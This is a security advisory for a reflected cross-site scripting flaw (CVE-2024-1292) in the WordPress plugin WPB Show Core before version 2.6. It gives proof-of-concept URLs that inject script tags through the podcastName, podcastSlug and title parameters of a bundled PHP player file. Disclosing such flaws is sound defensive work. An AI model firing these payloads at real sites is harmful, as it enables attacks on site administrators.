WordPress Plugin Vulnerabilities

WPB Show Core < 2.6 - Reflected XSS

Description

The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(1337)%3C/script%3E

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E//

https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-18-24%3Cscript%3Ealert(1337)%3C/script%3E&podcastName=Lightning+Thursdays&podCastImage=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podcastSlug=lightning-thursdays&siteurl=https%3A%2F%2Fwww.example.com&fileList%5B0%5D%5Bid%5D=49824&fileList%5B0%5D%5Bmp3%5D=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2024%2F01%2F18105309%2FLightning-TODAY-1-18-24.mp3&fileList%5B0%5D%5Btitle%5D=1-18-241-2%3Cscript%3Ealert(1337)%3C/script%3E&fileList%5B0%5D%5Bactual_mp3%5D=&blogid=874&rss_feed_link=https%3A%2F%2Fwww.example.com%2Fpodcast%2Flightning-thursdays%2Ffeed%2F%3Fpost_type%3Depisode&podImg_URL=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podCastId=78&episodeId=49824&audioPlayerOption=advance&gmf=-5&ckd=www.example.com&embedFlag=podcast

Affects Plugins

Plugin icon
wpb-show-core
Fixed in 2.6

References

CVE
CVE-2024-1292

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Aly Khaled Aly Abd Al-aal
Submitter
Aly Khaled Aly Abd Al-aal
Submitter website
https://0x41ly.github.io/
Submitter twitter
Aly_Khal3d
Verified
Yes
WPVDB ID
56d4fc48-d0dc-4ac6-93cd-f64d4c3c5c07

Timeline

Publicly Published
2024-03-18 (about 1 months ago)
Added
2024-03-18 (about 1 months ago)
Last Updated
2024-03-18 (about 1 months ago)

Other

Published
Title
Published
2021-08-23
Title
Post Views Counter < 1.3.5 - Authenticated Stored XSS
Published
2023-10-16
Title
Protección de Datos RGPD <= 3.1.0 - Reflected XSS
Published
2024-03-28
Title
WP-CRM System < 3.2.9.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
Published
2023-02-20
Title
Shipyaari Shipping Management <= 1.0 - Admin+ Stored XSS
Published
2023-01-12
Title
WP Blog and Widget < 2.3.1 - Contributor+ Stored XSS via Shortcode